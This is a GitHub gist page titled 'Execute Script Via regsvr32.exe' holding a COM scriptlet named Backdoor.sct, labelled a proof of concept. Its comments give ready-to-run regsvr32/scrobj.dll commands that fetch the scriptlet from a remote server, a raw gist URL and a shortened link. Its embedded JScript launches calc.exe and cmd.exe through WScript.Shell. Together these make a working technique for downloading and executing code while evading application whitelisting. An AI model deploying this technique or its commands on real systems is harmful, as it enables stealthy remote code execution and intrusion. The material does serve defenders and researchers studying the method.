Skip to content

Instantly share code, notes, and snippets.

@carnal0wnage
Forked from coh7eiqu8thaBu/Backdoor.sct
Created February 5, 2018 22:56
Show Gist options
  • Save carnal0wnage/c95ef9515158ab24eb48db5849541a17 to your computer and use it in GitHub Desktop.
Save carnal0wnage/c95ef9515158ab24eb48db5849541a17 to your computer and use it in GitHub Desktop.
Execute Script Via regsvr32.exe
<?XML version="1.0"?>
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{20001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- regsvr32 /s /i"C:\Bypass\Backdoor.sct" scrobj.dll -->
<!-- regsvr32 /s /i:http://server/Backdoor.sct scrobj.dll -->
<!-- That should work over a proxy and SSL/TLS... -->
<!-- regsvr32 /s https://gist.githubusercontent.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302/raw/bf04e98329ef471dcbbe621df5d61ddb4e802b63/Backdoor.sct -->
<!-- regsvr32 /s /n /u /i:https://gist.githubusercontent.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302/raw/bf04e98329ef471dcbbe621df5d61ddb4e802b63/Backdoor.sct scrobj.dll -->
<!-- regsvr32 /s /n /u /i:http://bit.ly/1S8dRjL scrobj.dll
<!-- Proof Of Concept - Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
<public>
<method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
function Exec()
{
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
}
]]>
</script>
</scriptlet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment